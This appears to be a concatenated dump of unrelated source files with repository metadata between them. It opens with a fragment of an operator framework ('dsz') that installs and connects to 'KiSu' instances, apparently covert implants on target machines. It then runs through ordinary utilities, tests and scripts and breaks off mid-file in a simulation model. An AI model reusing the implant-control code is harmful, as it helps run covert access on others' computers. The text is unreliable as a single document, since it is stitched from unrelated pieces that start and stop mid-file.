dsz.env.Set(KiSuEnabledEnv, 'on')
return True
def DisableKiSu():
dsz.env.Set(KiSuEnabledEnv, 'off')
return True
def IsKisuAvailable(instance=None, type=None):
return dsz.cmd.Run('available -command kisu_install')
def InstallKiSu(instance=None, type=None):
dsz.ui.Echo('entered')
instanceId = '-type PC'
if instance != None:
instanceId = '-instance 0x%08x' % instance
if type != None:
instanceId = '-type %s' % type
return dsz.cmd.Run('kisu_install %s' % instanceId)
def ConnectKiSu(instance=None, type=None):
instanceId = '-type PC'
if instance != None:
instanceId = '-instance %s' % instance
if type != None:
instanceId = '-type %s' % type
return dsz.cmd.Run('kisu_connect %s' % instanceId)
def DisconnectKiSu():
return dsz.cmd.Run('kisu_disconnect')
def EnsureConnected(ask=True):
if demi.IsConnected():
return True
if not ask:
dsz.ui.Echo('* Not currently connected to a KISU instance', dsz.ERROR)
return False
dsz.ui.Echo('* Not currently connected to a KISU instance', dsz.WARNING)
try:
str = dsz.ui.GetString('What KISU would you like to connect to?', 'pc')
except:
return False
key = '-type'
try:
if re.match('^([0-9]+)|(0[xX][0-9a-fA-F]{1,8})$', str):
key = '-instance'
except:
pass
dsz.ui.Echo('Loading KISU tool')
if not dsz.cmd.Run('available -command kisu_connect -load'):
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.ui.Echo('* Unable to load KISU tool', dsz.ERROR)
return False
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
dsz.ui.Echo('Attempting to connect to KISU %s' % str)
if not dsz.cmd.Run('kisu_connect %s %s' % (key, str)):
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.ui.Echo('* Unable to connect to a KISU instance', dsz.ERROR)
return False
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
def TranslateIdToName(id):
Unknown = 'Unknown'
if id == None:
return Unknown
else:
try:
import demi.mcf.kisu.ids
for name in demi.mcf.kisu.ids.nameTable:
if demi.mcf.kisu.ids.nameTable[name] == id:
return name
except:
pass
return Unknown
def TranslateNameToId(Name):
Unknown = 0
if Name == None:
return Unknown
else:
try:
import demi.mcf.kisu.ids
for kisuName in demi.mcf.kisu.ids.nameTable:
if kisuName.lower() == Name.lower():
return demi.mcf.kisu.ids.nameTable[kisuName]
except:
pass
return Unknown | unlicense | -6,117,307,922,654,907,000 | 23.696552 | 79 | 0.586313 | false | 3.199285 | false | false | false |
AronTrask/Kaspbot | libkasbot/ExcelBot/utils.py | 1 | 1672 | # Consider if this is the correct location for this element
def test_valid_coord(coord):
"""
    Returns True if coord is a tuple of two non-negative ints; raises AssertionError otherwise.
"""
assert type(coord) is tuple, "{} is not a tuple (coord)".format(coord)
assert type(coord[0]) is int, "{} is not an int (coord 0)".format(coord[0])
assert type(coord[1]) is int, "{} is not an int (coord 1)".format(coord[1])
assert coord[0] > -1, "{} must be greater than zero (coord 0)".format(coord[0])
assert coord[1] > -1, "{} must be greater than zero (coord 1)".format(coord[1])
return True
# This can probably be consolidated into an error class
def coord_range(coord0, coord1):
"""
Returns a list of coordinates for a table (by row) between two coordinate points of the form (0,0) where the first coordinate value is less than the second in both axes
@parameter - coord0, type = tuple
@parameter - coord1, type = tuple
@return, type = list of tuples or error
@dependencies, test_valid_coord (lf) which returns true or raises an assertion error
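    Example (illustrative): coord_range((0, 0), (1, 1)) returns
    [(0, 0), (0, 1), (1, 0), (1, 1)]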
"""
# _Testing
if test_valid_coord(coord0) and test_valid_coord(coord1):
pass
else:
raise TypeError("Rewrite coordinates") # consider if type error is the best error for this
# _Main
ret_list = []
if coord0[0] <= coord1[0] and coord0[1] <= coord1[1]:
init0 = coord0[0]
init1 = coord0[1]
while init0 < coord1[0] + 1:
while init1 < coord1[1] + 1:
ret_list.append((init0,init1))
init1 += 1
init0 += 1
init1 = coord0[1]
else:
raise TypeError("Specify a valid start and end coordinate")
return ret_list
| mit | -5,784,959,346,883,634,000 | 35.347826 | 172 | 0.617823 | false | 3.650655 | false | false | false |
south-coast-science/scs_dfe_eng | src/scs_dfe/particulate/opc_n3/opc_status.py | 1 | 3264 | """
Created on 16 Nov 2018
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
from collections import OrderedDict
from scs_core.data.json import JSONable
# --------------------------------------------------------------------------------------------------------------------
class OPCStatus(JSONable):
"""
classdocs
"""
CHARS = 6
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct(cls, chars):
if len(chars) != cls.CHARS:
raise ValueError(chars)
fan_on = chars[0]
laser_dac_on = chars[1]
fan_dac_value = chars[2]
laser_dac_value = chars[3]
laser_switch = chars[4]
gain_toggle = chars[5]
return OPCStatus(fan_on, laser_dac_on, fan_dac_value, laser_dac_value, laser_switch, gain_toggle)
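    # Illustrative use (hypothetical status bytes): the six characters read back
    # from the OPC map positionally onto the fields below, e.g.
    #   status = OPCStatus.construct([1, 1, 255, 140, 1, 0])
    #   status.fan_is_on()      # -> 1
    #   status.laser_is_on()    # -> 1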
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, fan_on, laser_dac_on, fan_dac_value, laser_dac_value, laser_switch, gain_toggle):
"""
Constructor
"""
self.__fan_on = int(fan_on)
self.__laser_dac_on = int(laser_dac_on)
self.__fan_dac_value = int(fan_dac_value)
self.__laser_dac_value = int(laser_dac_value)
self.__laser_switch = int(laser_switch)
self.__gain_toggle = int(gain_toggle)
# ----------------------------------------------------------------------------------------------------------------
def fan_is_on(self):
return self.fan_on & 0x01
def laser_is_on(self):
return self.laser_switch & 0x01
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['fan-on'] = self.fan_on
jdict['laser-dac-on'] = self.laser_dac_on
jdict['fan-dac-value'] = self.fan_dac_value
jdict['laser-dac-value'] = self.laser_dac_value
jdict['laser-switch'] = self.laser_switch
jdict['gain-toggle'] = self.gain_toggle
return jdict
# ----------------------------------------------------------------------------------------------------------------
@property
def fan_on(self):
return self.__fan_on
@property
def laser_dac_on(self):
return self.__laser_dac_on
@property
def fan_dac_value(self):
return self.__fan_dac_value
@property
def laser_dac_value(self):
return self.__laser_dac_value
@property
def laser_switch(self):
return self.__laser_switch
@property
def gain_toggle(self):
return self.__gain_toggle
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "OPCStatus:{fan_on:0x%02x, laser_dac_on:0x%02x, fan_dac_value:0x%02x, laser_dac_value:0x%02x, " \
"laser_switch:0x%02x, gain_toggle:0x%02x}" % \
(self.fan_on, self.laser_dac_on, self.fan_dac_value, self.laser_dac_value,
self.laser_switch, self.gain_toggle)
| mit | 409,894,917,096,973,500 | 27.382609 | 118 | 0.434743 | false | 4 | false | false | false |
predikto/python-sdk | predikto/errors.py | 1 | 1828 | # Copyright 2014-2015 Predikto, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
class RequestError(Exception):
def __init__(self, response, content=None, message=None):
self.response = response
self.content = content
self.message = message
def __str__(self):
message = "ERROR!"
if hasattr(self.response, 'status_code'):
message += " HTTP Status: %s." % (self.response.status_code)
if hasattr(self.response, 'message'):
message += " Message: %s." % (self.response.message)
if self.content is not None:
message += " Error: " + str(self.content)
return message
class MissingConfig(Exception):
pass
class ClientError(RequestError):
"""
Base
"""
pass
class InvalidResource(ClientError):
"""
400
"""
pass
class Unauthorized(ClientError):
"""
401
"""
pass
class Forbidden(ClientError):
"""
403
"""
pass
class ResourceNotFound(ClientError):
"""
404
"""
pass
class EntityTooLarge(ClientError):
"""
413
"""
pass
class ServerError(RequestError):
"""
500
"""
pass
class MethodNotAllowed(ClientError):
"""
405
"""
def allowed_methods(self):
return self.response['Allow']
| apache-2.0 | 675,187,820,182,811,300 | 18.869565 | 75 | 0.626368 | false | 4.145125 | false | false | false |
artwr/airflow | tests/utils/test_helpers.py | 3 | 9730 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import signal
import time
import unittest
from datetime import datetime
import psutil
import six
from airflow import DAG
from airflow.utils import helpers
from airflow.models import TaskInstance
from airflow.operators.dummy_operator import DummyOperator
class TestHelpers(unittest.TestCase):
@staticmethod
def _ignores_sigterm(child_pid, child_setup_done):
def signal_handler(signum, frame):
pass
signal.signal(signal.SIGTERM, signal_handler)
child_pid.value = os.getpid()
child_setup_done.release()
while True:
time.sleep(1)
@staticmethod
def _parent_of_ignores_sigterm(parent_pid, child_pid, setup_done):
def signal_handler(signum, frame):
pass
os.setsid()
signal.signal(signal.SIGTERM, signal_handler)
child_setup_done = multiprocessing.Semaphore(0)
child = multiprocessing.Process(target=TestHelpers._ignores_sigterm,
args=[child_pid, child_setup_done])
child.start()
child_setup_done.acquire(timeout=5.0)
parent_pid.value = os.getpid()
setup_done.release()
while True:
time.sleep(1)
def test_render_log_filename(self):
try_number = 1
dag_id = 'test_render_log_filename_dag'
task_id = 'test_render_log_filename_task'
execution_date = datetime(2016, 1, 1)
dag = DAG(dag_id, start_date=execution_date)
task = DummyOperator(task_id=task_id, dag=dag)
ti = TaskInstance(task=task, execution_date=execution_date)
filename_template = "{{ ti.dag_id }}/{{ ti.task_id }}/{{ ts }}/{{ try_number }}.log"
ts = ti.get_template_context()['ts']
expected_filename = "{dag_id}/{task_id}/{ts}/{try_number}.log".format(dag_id=dag_id,
task_id=task_id,
ts=ts,
try_number=try_number)
rendered_filename = helpers.render_log_filename(ti, try_number, filename_template)
self.assertEqual(rendered_filename, expected_filename)
def test_reap_process_group(self):
"""
Spin up a process that can't be killed by SIGTERM and make sure
it gets killed anyway.
"""
parent_setup_done = multiprocessing.Semaphore(0)
parent_pid = multiprocessing.Value('i', 0)
child_pid = multiprocessing.Value('i', 0)
args = [parent_pid, child_pid, parent_setup_done]
parent = multiprocessing.Process(target=TestHelpers._parent_of_ignores_sigterm,
args=args)
try:
parent.start()
self.assertTrue(parent_setup_done.acquire(timeout=5.0))
self.assertTrue(psutil.pid_exists(parent_pid.value))
self.assertTrue(psutil.pid_exists(child_pid.value))
helpers.reap_process_group(parent_pid.value, logging.getLogger(),
timeout=1)
self.assertFalse(psutil.pid_exists(parent_pid.value))
self.assertFalse(psutil.pid_exists(child_pid.value))
finally:
try:
                os.kill(parent_pid.value, signal.SIGKILL) # terminate doesn't work here
                os.kill(child_pid.value, signal.SIGKILL) # terminate doesn't work here
except OSError:
pass
def test_chunks(self):
with self.assertRaises(ValueError):
[i for i in helpers.chunks([1, 2, 3], 0)]
with self.assertRaises(ValueError):
[i for i in helpers.chunks([1, 2, 3], -3)]
self.assertEqual([i for i in helpers.chunks([], 5)], [])
self.assertEqual([i for i in helpers.chunks([1], 1)], [[1]])
self.assertEqual([i for i in helpers.chunks([1, 2, 3], 2)],
[[1, 2], [3]])
def test_reduce_in_chunks(self):
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + [y],
[1, 2, 3, 4, 5],
[]),
[[1, 2, 3, 4, 5]])
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + [y],
[1, 2, 3, 4, 5],
[],
2),
[[1, 2], [3, 4], [5]])
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + y[0] * y[1],
[1, 2, 3, 4],
0,
2),
14)
def test_is_in(self):
obj = ["list", "object"]
# Check for existence of a list object within a list
self.assertTrue(
helpers.is_in(obj, [obj])
)
# Check that an empty list returns false
self.assertFalse(
helpers.is_in(obj, [])
)
# Check to ensure it handles None types
self.assertFalse(
helpers.is_in(None, [obj])
)
# Check to ensure true will be returned of multiple objects exist
self.assertTrue(
helpers.is_in(obj, [obj, obj])
)
def test_is_container(self):
self.assertFalse(helpers.is_container("a string is not a container"))
self.assertTrue(helpers.is_container(["a", "list", "is", "a", "container"]))
def test_as_tuple(self):
self.assertEqual(
helpers.as_tuple("a string is not a container"),
("a string is not a container",)
)
self.assertEqual(
helpers.as_tuple(["a", "list", "is", "a", "container"]),
("a", "list", "is", "a", "container")
)
class HelpersTest(unittest.TestCase):
def test_as_tuple_iter(self):
test_list = ['test_str']
as_tup = helpers.as_tuple(test_list)
self.assertTupleEqual(tuple(test_list), as_tup)
def test_as_tuple_no_iter(self):
test_str = 'test_str'
as_tup = helpers.as_tuple(test_str)
self.assertTupleEqual((test_str,), as_tup)
def test_is_in(self):
from airflow.utils import helpers
# `is_in` expects an object, and a list as input
test_dict = {'test': 1}
test_list = ['test', 1, dict()]
small_i = 3
big_i = 2 ** 31
test_str = 'test_str'
test_tup = ('test', 'tuple')
test_container = [test_dict, test_list, small_i, big_i, test_str, test_tup]
# Test that integers are referenced as the same object
self.assertTrue(helpers.is_in(small_i, test_container))
self.assertTrue(helpers.is_in(3, test_container))
# python caches small integers, so i is 3 will be True,
# but `big_i is 2 ** 31` is False.
self.assertTrue(helpers.is_in(big_i, test_container))
self.assertFalse(helpers.is_in(2 ** 31, test_container))
self.assertTrue(helpers.is_in(test_dict, test_container))
self.assertFalse(helpers.is_in({'test': 1}, test_container))
self.assertTrue(helpers.is_in(test_list, test_container))
self.assertFalse(helpers.is_in(['test', 1, dict()], test_container))
self.assertTrue(helpers.is_in(test_str, test_container))
self.assertTrue(helpers.is_in('test_str', test_container))
bad_str = 'test_'
bad_str += 'str'
self.assertFalse(helpers.is_in(bad_str, test_container))
self.assertTrue(helpers.is_in(test_tup, test_container))
self.assertFalse(helpers.is_in(('test', 'tuple'), test_container))
bad_tup = ('test', 'tuple', 'hello')
self.assertFalse(helpers.is_in(bad_tup[:2], test_container))
def test_is_container(self):
self.assertTrue(helpers.is_container(['test_list']))
self.assertFalse(helpers.is_container('test_str_not_iterable'))
# Pass an object that is not iter nor a string.
self.assertFalse(helpers.is_container(10))
def test_cross_downstream(self):
"""Test if all dependencies between tasks are all set correctly."""
dag = DAG(dag_id="test_dag", start_date=datetime.now())
start_tasks = [DummyOperator(task_id="t{i}".format(i=i), dag=dag) for i in range(1, 4)]
end_tasks = [DummyOperator(task_id="t{i}".format(i=i), dag=dag) for i in range(4, 7)]
helpers.cross_downstream(from_tasks=start_tasks, to_tasks=end_tasks)
for start_task in start_tasks:
six.assertCountEqual(self, start_task.get_direct_relatives(upstream=False), end_tasks)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 9,064,997,477,779,371,000 | 37.458498 | 100 | 0.567215 | false | 3.948864 | true | false | false |
miarcompanies/sdn-wise-contiki | contiki/examples/zolertia/tutorial/99-apps/mqtt-node/internals/mqtt-check.py | 1 | 1042 | ### Taken from https://pypi.python.org/pypi/paho-mqtt
### Requires Paho-MQTT package, install by:
### pip install paho-mqtt
import paho.mqtt.client as mqtt
MQTT_URL = ""
MQTT_USERID = ""
MQTT_PASSWD = ""
MQTT_TOPIC_EVENT = ''
MQTT_TOPIC_PUB = ''
MQTT_PUB_STRING = ''
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
if MQTT_TOPIC_EVENT:
client.subscribe(MQTT_TOPIC_EVENT)
print("Subscribed to " + MQTT_TOPIC_EVENT)
if MQTT_PUB_STRING:
client.publish(MQTT_TOPIC_PUB, MQTT_PUB_STRING, 0)
print("Published " + MQTT_PUB_STRING + " to " + MQTT_TOPIC_PUB)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
print(msg.topic + " " + str(msg.payload))
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
print("connecting to " + MQTT_URL)
client.username_pw_set(MQTT_USERID, MQTT_PASSWD)
client.connect(MQTT_URL, 1883, 60)
client.loop_forever()
| bsd-3-clause | -5,148,396,591,194,084,000 | 26.421053 | 70 | 0.670825 | false | 2.831522 | false | false | false |
AZLisme/sihoo | sihoo/utils/time.py | 1 | 1785 | # -*- coding: utf-8 -*-
"""
Time handling module: unified utilities for time-related functions.
@author: AZLisme
@email: helloazl@icloud.com
"""
from datetime import datetime, timedelta
import pytz
import time
_DEFAULT_TIMEZONE = pytz.utc
def now(tz=None):
"""获取现在的日期对象(带时区)"""
if tz is None:
return datetime.now(tz=_DEFAULT_TIMEZONE)
else:
return datetime.now(tz=tz)
def get_timezone(tz_name: str):
"""获取时区对象,封装pytz
:param tz_name: 时区名字,常用的有'UTC', 'Asia/Shanghai'
:return:
"""
return pytz.timezone(tz_name)
def get_default_timezone():
"""获取默认时间戳
:return:
"""
return _DEFAULT_TIMEZONE
def set_default_timezone(tz_name: str) -> None:
"""设置默认的时区
:param Union(str, unicode) tz_name: 时区名字, 例如 'UTC', 'Asia/Shanghai'
:return: None
"""
global _DEFAULT_TIMEZONE
_DEFAULT_TIMEZONE = pytz.timezone(tz_name)
def timestamp(dt: datetime = None) -> float:
"""获取时间戳, 如果参数为None则返回当前时间戳
:param dt: 要转化为时间戳的时间,如果为None则返回当前时间戳。
:return float: 时间戳
"""
if dt is None:
return time.time()
else:
if dt.tzinfo is None:
dt = _DEFAULT_TIMEZONE.localize(dt)
utc_dt = dt.astimezone(pytz.utc)
        delta = utc_dt - datetime(1970, 1, 1, 0, 0, 0, 0, pytz.utc)
return delta.total_seconds()
def datetime_from_timestamp(ts: float) -> datetime:
""" 从时间戳获取日期对象
:param ts: 时间戳
:return: 日期对象
"""
    dt = datetime(1970, 1, 1, 0, 0, 0, 0, pytz.utc) + timedelta(seconds=ts)
return dt.astimezone(_DEFAULT_TIMEZONE)
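# Illustrative round trip (assumes a default timezone has been set):
#   set_default_timezone('Asia/Shanghai')
#   ts = timestamp(datetime(2017, 1, 1))   # naive datetime, localized to the default tz
#   datetime_from_timestamp(ts)            # -> 2017-01-01 00:00:00+08:00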
| gpl-3.0 | -3,036,369,990,444,020,000 | 19.333333 | 75 | 0.61377 | false | 2.390282 | false | false | false |
Officium/iLearn | pyml/gensim/textmining.py | 2 | 2539 | # -*- coding: utf-8 -*-
import gensim
import jieba
import pandas as pd
from tqdm import tqdm
from datetime import datetime
class yjiang(object):
def __init__(self):
self.idx2id = None
self.raw_sentence = None
self.preprocess_sentence = None
self.vecs = None
self.alternative_words = set()
def load_raw(self, file_path):
data = pd.read_csv(file_path)
self.idx2id = data["productid"].to_dict()
self.raw_sentence = data[u"commentcontent"].map(str).tolist()
def preprocess(self):
cut_sentence = [list(jieba.cut(s)) for s in tqdm(self.raw_sentence)]
        self.preprocess_sentence = cut_sentence  # stop words may still need to be removed here
def train_wordvec(self, param="default"):
if param == "default":
param = {
"size": 100, # Word vector dimensionality
"min_count": 5, # Minimum word count
"workers": 4, # Number of threads to run in parallel
"window": 10, # Context window size
"sample": 1e-3 # Downsample setting for frequent words
}
print "\n{} Training wordvector ...".format(datetime.now())
model = gensim.models.Word2Vec(self.preprocess_sentence, seed=1, **param)
model.init_sims(replace=True)
print "\n{} Saving wordvector ...".format(datetime.now())
model.save("{}features_{}mincount_{}windowsize".format(param["size"], param["min_count"], param["window"]))
def load_wordvec(self, filename, test=False):
self.vecs = gensim.models.Word2Vec.load(filename)
if test:
print self.vecs.most_similar(u"不错")
print "Successfully!"
def find_alternative_words(self, threshold=0.9, k=5):
print "{} Finding alternative words ...".format(datetime.now())
for w in tqdm(self.vecs.vocab):
            t = self.vecs.similar_by_vector(w, k)
i = 0
while i < k:
if t[i][1] >= threshold:
self.alternative_words.add((w, t[i][0]) if w > t[i][0] else (t[i][0], w))
else:
break
i += 1
def run(self, file_path):
self.load_raw(file_path)
self.preprocess()
self.train_wordvec()
self.load_wordvec('100features_5mincount_10windowsize')
self.find_alternative_words()
print "\n", self.alternative_words.__len__()
if __name__ == "__main__":
tt = yjiang()
tt.run("text.csv")
| apache-2.0 | 1,891,772,289,946,144,500 | 34.871429 | 115 | 0.56591 | false | 3.561702 | false | false | false |
Yipit/truck | tests/test_loader.py | 1 | 2758 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of truck
# <truck - test-friendly event bus layer on top of django signals>
# Copyright (C) <2012> Gabriel Falcão <gabriel@yipit.com>
# Copyright (C) <2012> Yipit Inc. <coders@yipit.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from mock import patch, call
from truck.core import Loader
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_be_able_to_load_a_single_module(imp, importlib):
u"Loader should be able to load a listener from a module"
importlib.import_module.return_value.__path__ = '/some/path'
Loader.import_listener_from_module('deal')
imp.find_module.assert_called_once_with('listeners', '/some/path')
importlib.import_module.assert_has_calls([
call('deal'),
call('deal.listeners'),
])
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_ignore_if_there_is_no_such_app(imp, importlib):
"Loader should ignore when the app does not exist"
importlib.import_module.side_effect = (
AttributeError('there is no such module'))
Loader.import_listener_from_module('deal')
importlib.import_module.assert_called_once_with('deal')
assert not imp.find_module.called
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_ignore_if_there_are_no_listeners(imp, importlib):
"Loader should ignore when the app does not exist"
importlib.import_module.return_value.__path__ = '/some/path'
imp.find_module.side_effect = ImportError('LOL')
Loader.import_listener_from_module('deal')
importlib.import_module.assert_called_once_with('deal')
imp.find_module.assert_called_once_with('listeners', '/some/path')
@patch.object(Loader, 'import_listener_from_module')
@patch('truck.core.settings')
def test_loader_start_maps_installed_apps(
settings, import_listener_from_module):
"Loader.start() should ignore when the app does not exist"
settings.INSTALLED_APPS = ['chuck', 'norris']
Loader.start()
import_listener_from_module.assert_has_calls([
call('chuck'),
call('norris'),
])
| lgpl-3.0 | -5,574,983,629,860,531,000 | 34.346154 | 72 | 0.713094 | false | 3.459222 | false | false | false |
941design/ptTools | ptTools/writers/ansiwriter.py | 1 | 5061 | #!/usr/bin/env python3
"""Module providing an AnsiParseTreeWriter for formatted printing of
ptTools.ParseTreeNodes to an output channel on linux systems."""
__all__ = [
'BLINK',
'BOLD',
'COLOR',
'COLORS',
'COMMENT',
'PRECEDENCE',
'UNDERLINE',
'AnsiParseTreeWriter',
]
from . verbosewriter import VerboseParseTreeWriter
BLINK = 'blink'
BOLD = 'bold'
COLOR = 'color'
COLORS = 'colors'
COMMENT = 'comment'
PRECEDENCE = 'precedence'
UNDERLINE = 'underline'
class AnsiParseTreeWriter(VerboseParseTreeWriter):
"""Writer for printing attributed ptTools.ParseTreeNodes to an
output channel on linux systems.
Note that the ansi markup sequence behaves differently from
e.g. html. A closing markup closes all opened markups. However,
opening sequences CAN be nested, but are all closed when
encountering the closing sequence.
The current style description is updated while traversing
non-terminal nodes, but not written until reaching a terminal.
Every token is embraced in its own opening and closing markup
sequence.
"""
## ANSI print sequence:
## {ESC}[{ATTR};{BG};{256colors};{FG}m
## e.g.: "\033[38;5;255mfoobar\033[39m"
_ansi_constants = {'ESC': '\033',
'BG': '5',
'FG': '0',}
def __init__(self, out):
"""Initialized with an output channel."""
super().__init__(out)
self._style = {}
"""The currently queued style dictionary."""
def _ansi_dict_from(self, style):
"""Converts style dictionary to ansi description dictionary."""
        ## Order of attributes IS significant!
attr = '38'
if style.get(BLINK):
attr = '5;' + attr
if style.get(UNDERLINE):
attr = '4;' + attr
if style.get(BOLD):
attr = '1;' + attr
ansidict = {'ATTR': attr,
'CLR' : style.get(COLOR,'')}
ansidict.update(self._ansi_constants)
return ansidict
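    # Illustrative mapping (hypothetical style): {BOLD: True, COLOR: '160'}
    # yields ATTR='1;38' and CLR='160', which _write_opening_markup_raw renders
    # as '\033[1;38;5;160m'; the closing sequence is always '\033[0m'.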
def _get_node_style(self, node):
"""Retrieves all inherited attributes of node and merges them
to one style dictionary.
Called from super.write_node(node).
"""
return node.all_attributes
def _get_token_style(self, tok):
"""Retrieves all attributes of token and returns style
dictionary.
Called from super.write_token(token).
"""
return tok.attributes
def _write_closing_markup(self, style=None):
"""Writes ansi style closing sequence to self.out, and clears
queued style information."""
self._write_closing_markup_raw(self._style)
self._style = {}
def _write_closing_markup_raw(self, style):
"""Writes ansi style closing sequence to self.out without
altering the queued style description."""
if style:
self._write_str("{ESC}[{FG}m".format(**self._ansi_constants))
def _write_leaf(self, node):
"""Writes terminal node with its tokens."""
if not node.tokens:
return
else:
## Tokens except the last token in terminalnode.tokens
## define their markup themselves, whereas the last token
## receives its node's markups.
for tok in node.tokens[:-1]:
token_style = self._get_token_style(tok)
self._write_opening_markup_raw(token_style)
super()._write_token(tok)
self._write_closing_markup_raw(token_style)
self._write_token(node.token) ## (last token).
def _write_opening_markup(self, style):
"""Queues style dictionary for output.
This method reimplements its superclass method. Called for
each node with the intention to write opening markups to
self.out. Here, we only queue the style information as we may
have to insert tokens with different markups, before.
"""
if style:
self._style.update(style)
def _write_opening_markup_raw(self, style):
"""Writes opening sequence as described by ansi_dict to
self.out, without altering the queued style description."""
if style:
ansi_dict = self._ansi_dict_from(style)
self._write_str('{ESC}[{ATTR};{BG};{CLR}m'.format(**ansi_dict))
def _write_indent(self, tok):
"""Calls super.
        TODO - Suspend markup (to avoid preceding underlines in
        multiline comments).
"""
super()._write_indent(tok)
def _write_spacing(self, tok):
"""Calls super.
        TODO - Suspend markup (to avoid preceding underlines in
        multiline comments).
"""
super()._write_spacing(tok)
def _write_token(self, tok):
"""Writes token and markups to self.out."""
self._write_opening_markup_raw(self._style)
super()._write_token(tok)
self._write_closing_markup_raw(self._style)
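# Minimal usage sketch (illustrative, not part of the original module): the public
# entry point write_node() is inherited from VerboseParseTreeWriter, as referenced in
# the docstrings above; `root` stands for an already-built ptTools parse tree.
#
#   import sys
#   writer = AnsiParseTreeWriter(sys.stdout)
#   writer.write_node(root)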
| gpl-3.0 | 5,937,019,086,103,000,000 | 30.04908 | 75 | 0.595534 | false | 4.162007 | false | false | false |
grokkers/cr-async | crasync/errors.py | 1 | 1899 | '''
MIT License
Copyright (c) 2017 grokkers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
class NotResponding(Exception):
def __init__(self):
self.code = 504
self.error = 'API request timed out, please be patient.'
super().__init__(self.error)
class RequestError(Exception):
'''Base class for request errors'''
def __init__(self, resp, data):
self.response = resp
self.code = resp.status
self.method = resp.method
self.reason = resp.reason
self.error = data.get('error')
if 'message' in data:
self.error = data.get('message')
self.fmt = '{0.reason} ({0.code}): {0.error}'.format(self)
super().__init__(self.fmt)
class NotFoundError(RequestError):
'''Raised if the player/clan is not found.'''
pass
class ServerError(RequestError):
'''Raised if the api service is having issues'''
pass | mit | 8,547,925,704,511,391,000 | 37 | 78 | 0.71248 | false | 4.267416 | false | false | false |
RoyBoy432/Emergence-Senescence | model/NYI_SSTOSIMPLE.py | 1 | 8783 | from __future__ import division
from random import shuffle, choice, randint, seed
from os.path import expanduser
from numpy import log10
from scipy import stats
import numpy as np
import time
import math
import copy
import sys
import os
from pprint import pprint as pp
mydir = expanduser("~/")
sys.path.append(mydir + "GitHub/Emergence-Senescence/model")
GenPath = mydir + "GitHub/Emergence-Senescence/results/simulated_data/"
col_headers = 'sim,r,gr,mt,q,rls_min,rls_max,grcv,mtcv,rlscv,ct,rlsmean,rlsvar,total.abundance,species.richness'
OUT = open("/gpfs/home/r/z/rzmogerr/Carbonate/SSTOSIMPLE.csv", 'w+')
print>>OUT, col_headers
OUT.close()
senesce_simple = lambda age, rls: (1-(age/(rls+0.01)))
#senesce_simple = lambda age, rls: 1
tradeoff_reverse_logistic = lambda rls: 2 / (2 + math.exp((0.2*rls)-8))#in the full implementation, don't enforce these parameters
#tradeoff_reverse_logistic = lambda rls: 2 / (2 + math.exp((0.2*rls)-4))
#tradeoff_reverse_logistic = lambda rls: rls/rls
g0delay = lambda rls: 1 / (1 + (rls/100))
#competitive_growth = lambda age:
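# Illustrative check of the ageing curves above (not part of the original model run):
# senesce_simple(0, 50) is ~1.0 (no penalty at birth) while senesce_simple(49, 50) is
# ~0.02, so an individual's growth rate decays roughly linearly over its replicative
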